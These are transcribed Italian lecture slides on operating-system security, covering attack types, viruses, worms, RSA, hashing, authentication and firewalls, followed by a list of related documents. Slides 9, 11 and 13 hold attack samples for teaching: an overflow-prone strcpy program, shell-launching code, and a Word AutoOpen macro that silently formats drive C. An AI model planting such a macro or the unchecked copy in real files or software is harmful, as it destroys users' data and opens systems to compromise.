Sistemi Operativi. Sicurezza: attacchi, contromisure, tecniche crittografiche e tool di analisi
|
|
- Geraldina Leo
- 8 anni fa
- Visualizzazioni
Transcript
1 Modulo di Sistemi Operativi per il corso di Master RISS: Ricerca e Innovazione nelle Scienze della Salute Unisa, Luglio 2012 Sistemi Operativi Sicurezza: attacchi, contromisure, tecniche crittografiche e tool di analisi
2 Contenuti Il problema della sicurezza Minacce dai programmi Minacce dal sistema e dalla rete Crittografia Autenticazione dell utente Implementazione di misure di sicurezza Firewall Classificazione dei sistemi
3 Obiettivi Discutere le minacce alla sicurezza e i tipi di attachi Spiegare l importanza di cifratura, autenticazione ed hashing Esaminare l uso della crittografia nella computazione Descrivere diverse contromisure agli attacchi
4 Il problema della sicurezza La sicurezza deve considerare l ambiente esterno al sistema, e proteggere le risorse del sistema Intruder e cracker cercano di far breccia nel sistema Minaccia (Threat): potenziale violazione di sicurezza Attacco (Attack): tentativo di far breccia nel sistema Attacchi possono essere accidentali o voluti E più facile proteggersi contro attacchi accidentali che contro usi maliziosi delle risorse
5 Violazioni della sicurezza Categorie Breach of confidentiality (violazione della riservatezza) Breach of integrity (violazione dell integrità) Breach of availability (violazione della disponibilità) Theft of service (furto di servizio) Denial of service (negazione del servizio) Metodi comuni d attacco Masquerading (Impersonificazione) - violazione dell autenticità Replay attack Message modification Man-in-the-middle attack Session hijacking (dirottamento della sessione)
6 Attacchi standard
7 Misure di sicurezza La sicurezza deve essere implementata nei seguenti 4 livelli per essere efficace: Fisico Umano Evitare social engineering: phishing (adescamento), dumpster diving Sistema Operativo Rete
8 Minacce da programmi Trojan Horse (cavallo di troia) Segmento di codice che abusa del proprio ambiente Sfrutta meccanismi che permettono a programmi scritti da certi utenti di essere eseguiti da altri utenti Spyware: pop-up browser windows, covert channel Trap Door (porta nascosta) Identificativo utente specifico o password che permette di aggirare le normali procedure di sicurezza Potrebbe essere inserita in un compilatore Logic Bomb (bomba logica) Programma che provoca un problema alla sicurezza al verificarsi di un determinato evento Stack e Buffer Overflow Sfrutta un bug in un programma (i.e., manda in overflow o lo stack o buffer di memoria)
9 Programma C con condizione per Buffer overflow #include <stdio.h> #define BUFFER SIZE 256 int main(int argc, char *argv[]) { } char buffer[buffer SIZE]; if (argc < 2) else { } return -1; strcpy(buffer,argv[1]); return 0;
10 Layout di un tipico frame dello stack
11 Codice per lanciare una shell #include <stdio.h> int main(int argc, char *argv[]) { execvp( \bin\sh, \bin \sh, NULL); return 0; }
12 Modifica del frame dello stack Before attack After attack
13 Virus Virus Frammento di codice immerso in un programma legittimo Progettato per una specifica architettura di CPU, sistema operativo o applicazioni Solitamente trasmessi tramite o come macro (pacchetto Office) Visual Basic Macro per riformattare un hard disk Sub AutoOpen() Dim ofs Set ofs = CreateObject( Scripting.FileSystemObject ) vs = Shell( c:command.com /k format c:,vbhide) End Sub
14 Tipologie di virus Un Virus dropper inserisce un virus nel sistema Esistono molte categorie di virus, diverse migliaia File Boot Macro Source code Polymorphic Encrypted Stealth Tunneling Multipartite Armored
15 Un virus che infetta il settore di boot
16 Minacce dal sistema e dalla rete Worm usa il meccanismo di creazione di processi; Internet worm Sfruttò le caratteristiche di networking di UNIX (e.g., accesso remoto) e bug nei programmi finger and sendmail Diviso in due parti: una prima parte (grappling hook) caricava il programma principale del worm Port scanning Tentativo automatizzato di connessione ad un range di porte o di indirizzi IP Denial of Service - DOS Sovraccaricare il computer target in modo da impedirgli di svolgere lavoro utile Distributed denial-of-service (DDOS) è un attacco sferrato da più parti contemporaneamente
17 Il Worm di Internet
18 Crittografia Maggior strumento disponibile per la sicurezza Sorgente e destinazione dei messaggi non possono fidarsi l una dell altra senza la crittografia Fornisce mezzi per restringere i potenziali mittenti (source) e/o riceventi (destination) di messaggi Sistemi basati su segreti: chiavi (key)
19 Comunicazione sicura su un canale insicuro
20 Cifratura Un algoritmo di cifratura consiste di Insieme K di chiavi Insieme M di messaggi in chiaro Insieme C di messaggi cifrati Un insieme di funzioni E k : M C. Cioè, per ogni k K, E k è una funzione per generare cifrati da messaggi in chiaro. E k per ogni k deve essere computabile efficientemente. Un insieme di funzioni D k : C M. Cioè, per ogni k K, D k è una funzione per generare messaggi in chiaro da messaggi cifrati. D k per ogni k deve essere computabile efficientemente
21 Cifratura Un algoritmo di cifratura deve soddisfare la seguente proprietà: dato un cifrato c C, è possibile calcolare m tale che E k (m) = c solo che si possiede la chiave k. Pertanto, per esempio, un computer che possiede k può decifrare messaggi cifrati nei corrispondenti messaggi in chiaro usati per produrli, mentre un computer che non possiede k non può farlo. Poichè i messaggi cifrati sono inviati su rete, è importante che non sia possibile ricavare k dai cifrati.
22 Cifrari simmetrici Stessa chiave usata per cifrare e decifrare E k può essere derivata da D k, e viceversa DES è stato l algoritmo di cifratura simmetrico più usato (creato dal governo USA) Cifra un blocco di dati per volta Triple-DES c = E k3 (D k2 (E k1 (m))) Advanced Encryption Standard (AES) ha sostituito DES Stream cipher Cifra/decifra un flusso (stream) di byte (i.e trasmissioni wireless) La chiave viene usata come input per un generatore di bit pseudo-random Genera una keystream
23 Cifrari asimmetrici Cifratura a chiave pubblica. Ogni utente ha due chiavi: chiave pubblica pubblica, usata per cifrare dati chiave privata chiave nota solo all utente, usata per decifrare dati Deve essere computazionalmente inammissibile calcolare la chiave privata a partire dalla chiave pubblica Il più comune è l algoritmo RSA Esistono algoritmi efficienti per verificare se un numero di grossa taglia è primo Non si conoscono algoritmi efficienti per calcolare i fattori primi di un numero composto di grossa taglia
24 Cifrari asimmetrici Formalmente, è computazionalmente inammissibile calcolare d mod N da e mod N, e quindi e mod N può essere resa pubblica e chiave pubblica d chiave privata N è il prodotto di due grandi primi scelti a caso, p e q (per esempio, p e q sono di 512 bit ciascuno) Algoritmo di cifratura: E e (m) = m e mod N, dove e soddisfa ed mod (p 1)(q 1) = 1 Algoritmo di decifratura: D d (c) = c d mod N
25 Esempio giocattolo Siano p = 7 e q = 13 Calcoliamo N = 7 13 = 91 e (p 1)(q 1) = 72 Scegliamo e relativamente primo a 72, per esempio 5 Infine, calcoliamo d tale che ed mod 72 = 1, ottenendo 29 Disponiamo ora delle nostre chiavi Chiave pubblica (e, N ) = (5, 91) Chiave privata (d, N ) = (29, 91) Cifrare il messaggio 69 con la chiave pubblica dà il cifrato 62 Il cifrato può essere decifrato con la chiave privata
26 RSA: cifratura e decifratura
27 Crittografia I cifrari simmetrici sono essenzialmente basati su trasformazioni (e.g., sostituzioni, permutazioni), quelli asimmetrici su funzioni matematiche Cifratura asimmetrica richiede uno sforzo computazionale di gran lunga maggiore Tipicamente non viene usata per cifrare grosse quantità di dati Approccio ibrido
28 Autenticazione Restringe l insieme dei potenziali mittenti di messaggi Complementare alla cifratura Prova anche che il messaggio non è stato modificato Componenti di un algoritmo Un insieme K di chiavi Un insieme M di messaggi Un insieme A di autenticatori Un insieme di funzioni S k : M A Cioè, per ogni k K, S k è una funzione per generare autenticatori per messaggi S k per ogni k devono essere funzioni efficientemente computabili Un insieme di funzioni V k : M A {true, false}. Cioè, per ogni k K, V k è una funzione per verificare gli autenticatori dei messaggi V k per ogni k devono essere funzioni efficientemente computabili
29 Autenticazione Per un messaggio m, un computer può generare un autenticatore a A tale che V k (m, a) = true solo se possiede k Pertanto, il computer che possiede k può generare autenticatori su messaggi in modo tale che ogni altro computer che possiede k li può verificare Computer che non posseggono k non possono generare autenticatori di messaggi che possono essere verificati usando k Poichè gli autenticatori vengono inviati con i messaggi su rete, non deve essere possibile derivare k dagli autenticatori
30 Funzioni hash Base per autenticazione Crea un piccolo blocco di dati h, di taglia fissa (message digest, valore hash) a partire dal messaggio m Una funzione hash H deve essere resistente a collisioni su m Deve essere inammissibile trova due messaggi m m tali che H(m) = H(m ) Uso: se H(m) = h, allora m non è stato modificato Funzioni hash comuni sono MD5, che produce un message digest di 128-bit, e SHA che dà in output un valore hash di 160 bit
31 MAC Cifratura simmetrica usata in algoritmi di autenticazione: message-authentication code (MAC) Semplice esempio: MAC definito da S k (m) = f(k, H(m)) dove f è una funzione one-way nel primo argomento k non può essere calcolato da a=f(k, H(m)) La resistenza a collisioni della funzione hash, assicura che nessun altro messaggio genera lo stesso MAC Algoritmo di verifica: V k (m, a) (f(k,h(m)) = a) Nota che k è necessario per calcolare sia S k che V k
32 Firme digitali (digital signature) Basato su chiavi asimmetriche Gli autenticatori prodotti sono detti firme digitali (digital signature) In un algoritmo per firme digitali, è computazionalmente inammissibile calcolare S ks da V kv V è una funzione one-way Pertanto, kv è la chiave di verifica (pubblica) e ks è la chiave di firma (privata) Algoritmo di firma RSA Simile all algoritmo di cifratura RSA, ma l uso delle chiavi è invertito Firma di un messaggio S ks (m) = H(m) ks mod N La chiave ks è il valore d ed N è il prodotto di p e q (primi grandi scelti a caso) Algoritmo di verifica: V kv (m, a) (a kv mod N = H(m)) dove kv soddisfa kvks mod (p 1)(q 1) = 1
33 Autenticazione Autenticazione vs cifratura Meno computazioni (eccetto per firme RSA) Autenticatore di solito più corto del messaggio Spesso si desidera autenticazione ma non riservatezza Moduli firmati et al Base per il non ripudio (non-repudiation)
34 Distribuzione di chiavi Distribuzione di chiavi simmetriche grossa sfida Spesso effettuata in fase di set up Chiavi simmetriche possono proliferare Anche le chiavi pubbliche negli algoritmi asimmetrici debbono essere distribuite con cura man-in-the-middle attack
35 Man-in-the-middle Attack
36 Certificati digitali Stabilisce l associazione utente - chiave pubblica Chiave pubbliche firmate digitalmente da una parte fidata La parte fidata riceve una prova dell identità dell entità e certifica che la chiave pubblica appartiene a quella entità. Le autorità di certificazione sono parti fidate le loro chiavi pubbliche sono incluse nei browser Esse garantiscono per altre autorità, firmando digitalmente le loro chiavi e così via, creando una rete fidata
37 SSL Inserimento della crittografia in un livello del modello di rete ISO (il livello di trasporto) SSL Secure Socket Layer (anche chiamato TLS) Protocollo crittografico che permette a due computer di scambiarsi messaggi in modo sicuro Complesso, con molte varianti Usato tra web server e browser per comunicazioni sicure (e.g., invio di numeri di carte di credito) Il server viene verificato con un certificato che assicura il client di parlare con il server giusto La crittografia asimmetrica viene usata per stabilire una chiave di sessione (per un cifrario simmetrico) per cifrare i dati durante la sessione (approccio ibrido)
38 Autenticazione dell utente Cruciale per identificare correttamente l utente, poichè la protezione del sistema dipende dall ID dell utente L identità dell utente è spesso accertata tramite password Le password debbono essere tenute segrete Cambio frequente di password Uso di password difficili da indovinare Log di tutti i tentativi di accesso invalidi Password possono anche essere cifrate o utilizzabili una sola volta (one-time password)
39 Autenticazione dell utente Protocolli sfida risposta (challenge response) Code book Tecniche biometriche Impronta digitale Misure sulla retina Temperatura Dispositivi fisici (smart card, chiavi, penne ) Autenticazione con più tecniche contemporaneamente
40 Implementazione di misure di difesa Una politica di sicurezza descrive cosa deve essere protetto La valutazione delle vulnerabilità confronta lo stato reale del sistema/rete con la politica di sicurezza La ricognizione delle intrusioni controlla i tentativi di intrusione e i successi La ricognizione basata su firme (Signature-based detection) usa pattern conosciuti La ricognizione delle anomalie (Anomaly detection) controlla le differenze con comportamenti normali Permette di individuare attacchi nuovi (zero-day attacks) Falsi positivi e falsi negativi sono un problema Protezione dai virus Auditing, accounting, and logging di tutte le attività del sistema e della rete
41 Firewall Un firewall viene posizionato tra computer fidati e non fidati Il firewall limita l accesso alla rete tra questi due domini di sicurezza Può essere aggirato attraverso tunnelling o spoofing Il tunneling permette ad un protocollo vietato di essere usato all interno di un protocollo permesso (i.e. telnet all interno di HTTP) Le regole di quei firewall che si basano sul nome dell host o sull indirizzo IP sono soggette a spoofing Firewall personali: livello software su un host Monitorizza/limita il traffico da e verso l host Un firewall proxy per un applicazione conosce l applicazione e la può controllare (i.e. SMTP) Un firewall per le chiamate di sistema monitorizza tutte le chiamate di sistema importanti e ne controlla l uso attraverso regole (i.e. questo programma può eseguire questa system call)
42 Sicurezza di rete attraverso la separazione dei domini attraverso un Firewall
43 Classificazione della sicurezza Il dipartimento della difesa U.S. usa quettro categorie per la sicurezza dei computer: A, B, C, e D. D Requisiti di sicurezza minima. C Fornisce protezione discrezionale attraverso auditing. Divisa in C1 e C2. C1 identifica utenti che cooperano con lo stesso livello di protezione. C2 permette controllo dell accesso a livello utente. B Tutte le proprietà di C, ma ogni oggetto ha una specifica label che ne definisce la protezione. Divisa in B1, B2, e B3. A Usa tecniche formali per il disegno e la verifica per garantire la sicurezza.
SICUREZZA. Sistemi Operativi. Sicurezza
SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema
Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1
SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema
SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer
: applicazioni telematiche Secure Socket Layer E-commerce Trading on-line Internet banking... Protocollo proposto dalla Netscape Communications Corporation Garantisce confidenzialità e affidabilità delle
La sicurezza nel Web
La sicurezza nel Web Protezione vs. Sicurezza Protezione: garantire un utente o un sistema della non interazione delle attività che svolgono in unix ad esempio i processi sono protetti nella loro esecuzione
La sicurezza nelle comunicazioni Internet
Accesso remoto sicuro a intranet e a server aziendali di posta elettronica Un esempio Cosa ci si deve aspettare di sapere alla fine del corso La sicurezza nelle comunicazioni Internet Esiste un conflitto
Approfondimento di Marco Mulas
Approfondimento di Marco Mulas Affidabilità: TCP o UDP Throughput: banda a disposizione Temporizzazione: realtime o piccoli ritardi Sicurezza Riservatezza dei dati Integrità dei dati Autenticazione di
La sicurezza nelle reti di calcolatori
La sicurezza nelle reti di calcolatori Contenuti del corso La progettazione delle reti Il routing nelle reti IP Il collegamento agli Internet Service Provider e problematiche di sicurezza Analisi di traffico
Comunicazioni sicure su Internet: https e SSL. Fisica dell Informazione
Comunicazioni sicure su Internet: https e SSL Fisica dell Informazione Il servizio World Wide Web (WWW) Come funziona nel dettaglio il Web? tre insiemi di regole: Uniform Resource Locator (URL) Hyper Text
La sicurezza nelle reti di calcolatori
La sicurezza nelle reti di calcolatori Contenuti del corso La progettazione delle reti Il routing nelle reti IP Il collegamento agli Internet Service Provider e problematiche di sicurezza Analisi di traffico
PRINCIPI DI COMPUTER SECURITY. Andrea Paoloni
PRINCIPI DI COMPUTER SECURITY Andrea Paoloni 2 Cade il segreto dei codici cifrati Corriere della Sera 26 febbraio 2008 3 Gli hacker sono utili? 4 Safety vs Security SAFETY (salvezza): protezione, sicurezza
Sicurezza nei Sistemi Distribuiti
Sicurezza nei Sistemi Distribuiti Aspetti di Sicurezza La sicurezza nei sistemi distribuiti deve riguardare tutti i componenti del sistema e coinvolge due aspetti principali: Le comunicazioni tra utenti
Sicurezza nei Sistemi Distribuiti
Sicurezza nei Sistemi Distribuiti Aspetti di Sicurezza La sicurezza nei sistemi distribuiti deve riguardare tutti i componenti del sistema e coinvolge due aspetti principali: Le comunicazioni tra utenti
RETI DI CALCOLATORI. Crittografia. La crittografia
RETI DI CALCOLATORI Crittografia La crittografia La crittografia è la scienza che studia la scrittura e la lettura di messaggi in codice ed è il fondamento su cui si basano i meccanismi di autenticazione,
Sicurezza nelle applicazioni multimediali: lezione 7, sicurezza dei protocolli. Sicurezza dei protocolli (https, pop3s, imaps, esmtp )
Sicurezza dei protocolli (https, pop3s, imaps, esmtp ) Stack di protocolli nella trasmissione della posta elettronica 2 Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione
La Firma Digitale La sperimentazione nel Comune di Cuneo. Pier Angelo Mariani Settore Elaborazione Dati Comune di Cuneo
La Firma Digitale La sperimentazione nel Comune di Cuneo Pier Angelo Mariani Settore Elaborazione Dati Comune di Cuneo Perchè questa presentazione Il Comune di Cuneo, aderente alla RUPAR, ha ricevuto due
La firma digitale CHE COSA E'?
La firma digitale La Firma Digitale è il risultato di una procedura informatica che garantisce l autenticità e l integrità di messaggi e documenti scambiati e archiviati con mezzi informatici, al pari
Protezione delle informazioni in SMart esolutions
Protezione delle informazioni in SMart esolutions Argomenti Cos'è SMart esolutions? Cosa si intende per protezione delle informazioni? Definizioni Funzioni di protezione di SMart esolutions Domande frequenti
Informatica per la comunicazione" - lezione 13 -
Informatica per la comunicazione" - lezione 13 - Funzionamento di una password" 1: l utente tramite il suo browser richiede l accesso a una pagina del server; 2: il server richiede il nome utente e la
La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.
Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione
Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative
Obiettivo: realizzazione di reti sicure Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Per quanto riguarda le scelte tecnologiche vi sono due categorie di tecniche: a) modifica
Sicurezza in Internet. Criteri di sicurezza. Firewall
Sicurezza in Internet cannataro@unicz.it 1 Sommario Internet, Intranet, Extranet Criteri di sicurezza Servizi di filtraggio Firewall Controlli di accesso Servizi di sicurezza Autenticazione Riservatezza,
Sicurezza dei sistemi informatici Firma elettronica E-commerce
Sicurezza dei sistemi informatici Firma elettronica E-commerce Il contesto applicativo Commercio elettronico Quanti bit ho guadagnato!! Marco Mezzalama Politecnico di Torino collegamenti e transazioni
Programmazione in Rete
Programmazione in Rete a.a. 2005/2006 http://www.di.uniba.it/~lisi/courses/prog-rete/prog-rete0506.htm dott.ssa Francesca A. Lisi lisi@di.uniba.it Orario di ricevimento: mercoledì ore 10-12 Sommario della
Sicurezza in Internet
Sicurezza in Internet Mario Cannataro cannataro@unicz.it 1 Sommario Internet, Intranet, Extranet Servizi di filtraggio Firewall Servizi di sicurezza Autenticazione Riservatezza ed integrità delle comunicazioni
Reti di Telecomunicazione Lezione 8
Reti di Telecomunicazione Lezione 8 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Livello di trasporto Programma della lezione relazione tra lo strato di trasporto e lo strato
Sommario. Introduzione alla Sicurezza Web
Sommario Introduzione alla Sicurezza Web Considerazioni generali IPSec Secure Socket Layer (SSL) e Transport Layer Security (TLS) Secure Electronic Transaction (SET) Introduzione alla crittografia Introduzione
IDS: Intrusion detection systems
IDS/IPS/Honeypot IDS: Intrusion detection systems Tentano di rilevare: attività di analisi della rete tentativi di intrusione intrusioni avvenute comportamenti pericolosi degli utenti traffico anomalo
Man-in-the-middle su reti LAN
Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica 21 Marzo 2011 Scaletta 1 2 LAN switched ARP Alcuni attacchi MITM 3 4 5 Che cos è L attacco man-in-the-middle
Corso di Sicurezza Informatica. Sicurezza Web. Ing. Gianluca Caminiti
Corso di Sicurezza Informatica Sicurezza Web Ing. Gianluca Caminiti SSL Sommario Considerazioni sulla Sicurezza del Web Secure Socket Layer (SSL) 3 Brevi Considerazioni sulla Sicurezza del Web Web come
Il glossario della Posta Elettronica Certificata (PEC) Diamo una definizione ai termini tecnici relativi al mondo della PEC.
Il glossario della Posta Elettronica Certificata (PEC) Diamo una definizione ai termini tecnici relativi al mondo della PEC. Avviso di mancata consegna L avviso, emesso dal sistema, per indicare l anomalia
! La crittoanalisi è invece la scienza che cerca di aggirare o superare le protezioni crittografiche, accedendo alle informazioni protette
Crittografia Cenni Damiano Carra Università degli Studi di Verona Dipartimento di Informatica La crittografia! Scienza che si occupa di proteggere l informazione rendendola sicura, in modo che un utente
Vendere online. Andrea Marin. Università Ca Foscari Venezia SVILUPPO INTERCULTURALE DEI SISTEMI TURISTICI SISTEMI INFORMATIVI PER IL TURISMO
Andrea Marin Università Ca Foscari Venezia SVILUPPO INTERCULTURALE DEI SISTEMI TURISTICI SISTEMI INFORMATIVI PER IL TURISMO a.a. 2013/2014 Section 1 Introduzione Parliamo di acquisti online quando a seguito
Che cosa è un VIRUS?
Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo
Introduzione alla crittografia con OpenPGP
Introduzione alla crittografia con OpenPGP D avide Cerri dav ide@ linux.it Crittografia Per proteggere le comunicazioni su Internet si utilizza la crittografia. La crittografia è la scienza che si occupa
Cognome: Nome: Matricola: Sicurezza dei sistemi informatici e delle reti 18 febbraio 2014
Tempo a disposizione: 70 minuti. Libri e appunti chiusi. Vietato comunicare con chiunque. Vietato l'uso di smartphone, calcolatrici e affini. 1. Protocolli crittografici. 1.1. Fornisci un esempio di protocollo
Corso di ARCHITETTURA DEI SISTEMI INFORMATIVI - Prof. Crescenzio Gallo. 114 Sistemi informativi in rete e sicurezza 4.6
Approcci al problema della sicurezza 114 Sistemi informativi in rete e sicurezza 4.6 Accessi non autorizzati Hacker: coloro che si avvalgono delle proprie conoscenze informatiche e di tecnologia delle
Aspetti di sicurezza in Internet e Intranet. arcipelago
Aspetti di sicurezza in Internet e Intranet La sicurezza in reti TCP/IP Senza adeguate protezioni, la rete Internet è vulnerabile ad attachi mirati a: penetrare all interno di sistemi remoti usare sistemi
Sistemi Operativi MECCANISMI E POLITICHE DI PROTEZIONE. D. Talia - UNICAL. Sistemi Operativi 13.1
MECCANISMI E POLITICHE DI PROTEZIONE 13.1 Protezione Obiettivi della Protezione Dominio di Protezione Matrice di Accesso Implementazione della Matrice di Accesso Revoca dei Diritti di Accesso Sistemi basati
MECCANISMI E POLITICHE DI PROTEZIONE 13.1
MECCANISMI E POLITICHE DI PROTEZIONE 13.1 Protezione Obiettivi della Protezione Dominio di Protezione Matrice di Accesso Implementazione della Matrice di Accesso Revoca dei Diritti di Accesso Sistemi basati
Elementi di Sicurezza e Privatezza Lezione 1 - Introduzione
Elementi di Sicurezza e Privatezza Lezione 1 - Introduzione Chiara Braghin chiara.braghin@unimi.it Inziamo a interagire Chi prova a rispondere alle seguenti domande: w Cosa si intende per sicurezza informatica?
Firma Digitale. dott. Andrea Mazzini
Firma Digitale dott. Andrea Mazzini La Crittografia La prima persona che usò la crittografia fu Giulio Cesare! Egli doveva inviare messaggi ma non si fidava dei messaggeri, così inventò un metodo per codificare
Applicazioni per l autenticazione Sicurezza nelle reti di TLC - Prof. Marco Listanti - A.A. 2008/2009
Applicazioni per l autenticazione Kerberos Kerberos Servizio di autenticazione sviluppato dal MIT Fornisce un server di autenticazione centralizzato Basato su crittografia simmetrica (chiave privata) Permette
SETEFI. Marco Cantarini, Daniele Maccauro, Domenico Marzolla. 19 Aprile 2012
e VIRTUALCARD 19 Aprile 2012 e VIRTUALCARD Introduzione Il nostro obiettivo é quello di illustrare la struttura e le caratteristiche di fondo che stanno alla base delle transazioni online operate tramite
La gestione di rete OSI
Dipartimento di Elettronica e Telecomunicazioni La gestione di rete OSI pecos,giada@lenst.det.unifi.it 1 Cosa e come gestire? I servizi Workstation Gestore di rete Workstation Server Router 2 1.1 Cosa
Esercitazione 02. Sommario. Un po di background (1) Un certificato digitale in breve. Andrea Nuzzolese
Sommario Esercitazione 02 Andrea Nuzzolese Certificati Descrizione esercitazione Free Secure Email Certificates (con InstantSSL) ALMA MATER STUDIORUM UNIVERSITA DI BOLOGNA Un certificato digitale in breve
Meccanismi di autenticazione sicura. Paolo Amendola GARR-CERT
Meccanismi di autenticazione sicura Paolo Amendola GARR-CERT Argomenti Crittografazione del traffico Identita digitali One-time passwords Kerberos Crittografazione del traffico Secure Shell SASL SRP sftp
Tipologie e metodi di attacco
Tipologie e metodi di attacco Tipologie di attacco Acquisizione di informazioni L obiettivo è quello di acquisire informazioni, attraverso l intercettazione di comunicazioni riservate o ottenendole in
Sicurezza nelle reti
Sicurezza nelle reti A.A. 2005/2006 Walter Cerroni Sicurezza delle informazioni: definizione Garantire la sicurezza di un sistema informativo significa impedire a potenziali soggetti attaccanti l accesso
Firewall, Proxy e VPN. L' accesso sicuro da e verso Internet
L' accesso sicuro da e verso Internet L' accesso ad Internet è ormai una necessità quotidiana per la maggior parte delle imprese. Per garantire la miglior sicurezza mettiamo in opera Firewall sul traffico
Acquisto con carta di credito. Acquisto con carta di credito
Acquisto con carta di credito Vantaggio: facile da implementare Svantaggio: per un malintenzionato è più facile carpire il numero della carta attraverso Internet che non via telefono Svantaggio: credibilità
Cenni sulla Sicurezza in Ambienti Distribuiti
Cenni sulla Sicurezza in Ambienti Distribuiti Cataldo Basile < cataldo.basile @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Motivazioni l architettura TCP/IPv4 è insicura il problema
Gestione degli accessi al sistema(autenticazione) e ai locali. Analisi del traffico di rete (Firewall, IDS/IPS)
Contromisure Contromisure Gestione degli accessi al sistema(autenticazione) e ai locali Antivirus Analisi del traffico di rete (Firewall, IDS/IPS) Analisi utilizzo delle risorse di sistema, accessi (IDS/IPS)
Esercitazione 2 Certificati
Sommario Esercitazione 2 Certificati Laboratorio di 2015/2016 Andrea Nuzzolese Certificati Descrizione esercitazione Free Secure Email Certificates (con InstantSSL) ALMA MATER STUDIORUM UNIVERSITA DI BOLOGNA
CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali
CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano
Gennaio. SUAP On Line i pre-requsiti informatici: La firma digitale
2008 Gennaio SUAP On Line i pre-requsiti informatici: La firma digitale 1 La firma digitale Indice La firma digitale La firma digitale: destinatario 2 La firma digitale Cos è La Firma Digitale è il risultato
Sicurezza a livello IP: IPsec e le reti private virtuali
Sicurezza a livello IP: IPsec e le reti private virtuali Davide Cerri Sommario L esigenza di proteggere l informazione che viene trasmessa in rete porta all utilizzo di diversi protocolli crittografici.
Crittografia e sicurezza informatica. Sistema di voto elettronico
Crittografia e sicurezza informatica Sistema di voto elettronico Deliano Perfetti Gabriele Paone Anno 2003 1 indice 1. Specifiche 2 2. Scelte progettuali 2 Schema Server Authority Server di Voto Client
Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link
Sicurezza ai livelli di rete e data link Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione può essere introdotto anche ai livelli inferiori dello stack 2 Sicurezza
Contesto: Peer to Peer
Contesto: Peer to Peer Un architettura di rete P2P è caratterizzata da: Connessioni dirette tra i suoi componenti. Tutti i nodi sono entità paritarie (peer). Risorse di calcolo, contenuti, applicazioni
Serve a garantire la nostra privacy nell era era della comunicazione digitale.
La crittografia di Antonio Cilli 1. La crittografia, perché? 2. Crittografia asimmetrica 3. Firma digitale 4. Documento elettronico 5. Autorità di certificazione 6. Certificati digitali 7. Requisiti di
Principi di crittografia Integrità dei messaggi Protocolli di autenticazione Sicurezza nella pila di protocolli di Internet: PGP, SSL, IPSec
Crittografia Principi di crittografia Integrità dei messaggi Protocolli di autenticazione Sicurezza nella pila di protocolli di Internet: PGP, SSL, IPSec Elementi di crittografia Crittografia: procedimento
Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.
Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza
Lezione 7 Sicurezza delle informazioni
Lezione 7 Sicurezza delle informazioni Sommario Concetti generali Meccanismi per la sicurezza IT: Crittografia Hash Firma digitale Autenticazione 1 Concetti generali Availability Confidentiality Integrity
Appendice:: Spunti sulla sicurezza e Internet Materiale fuori programma dedicato rigorosamente solo ai curiosi. prof.
Operatore Informatico Giuridico Informatica Giuridica di Base A.A 2003/2004 I Semestre Appendice:: Spunti sulla sicurezza e Internet Materiale fuori programma dedicato rigorosamente solo ai curiosi prof.
Sicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall
I firewall Perché i firewall sono necessari Le reti odierne hanno topologie complesse LAN (local area networks) WAN (wide area networks) Accesso a Internet Le politiche di accesso cambiano a seconda della
Sommario. 1.1 Problematiche di sicurezza 6. 1.1.1 Cos'è la Sicurezza Informatica 6. 1.1.2 Il modello di riferimento 7
Introduzione 2 Capitolo I - Sicurezza Informatica e Crittografia 6 1.1 Problematiche di sicurezza 6 1.1.1 Cos'è la Sicurezza Informatica 6 1.1.2 Il modello di riferimento 7 1.1.3 Valutazione del rischio
Internet e posta elettronica. A cura di Massimiliano Buschi
Internet e posta elettronica A cura di Massimiliano Buschi Concetti fondamentali Internet www Tcp/ip Browser Terminologia Esistono un sacco di termini con cui bisogna famigliarizzare http url Link Isp
PEC un obbligo che semplifica
PEC un obbligo che semplifica Obbligatorietà della PEC. Risvolti organizzativi e opportunità per lo studio professionale STEFANO STRINGA Ordine Dottori Commercialisti e Esperti Contabili di Mantova Da
Connessioni sicure: ma quanto lo sono?
Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure
da chi proviene un messaggio?
da chi proviene un messaggio? in un crittosistema simmetrico solo Alice e Bob conoscono la chiave se Bob riceve un messaggio di Alice e la decifratura del messaggio ha senso, il messaggio proviene certamente
L avvocato hacker. Genova, 15 marzo 2012. Prof. Giovanni Ziccardi Università degli Studi di Milano
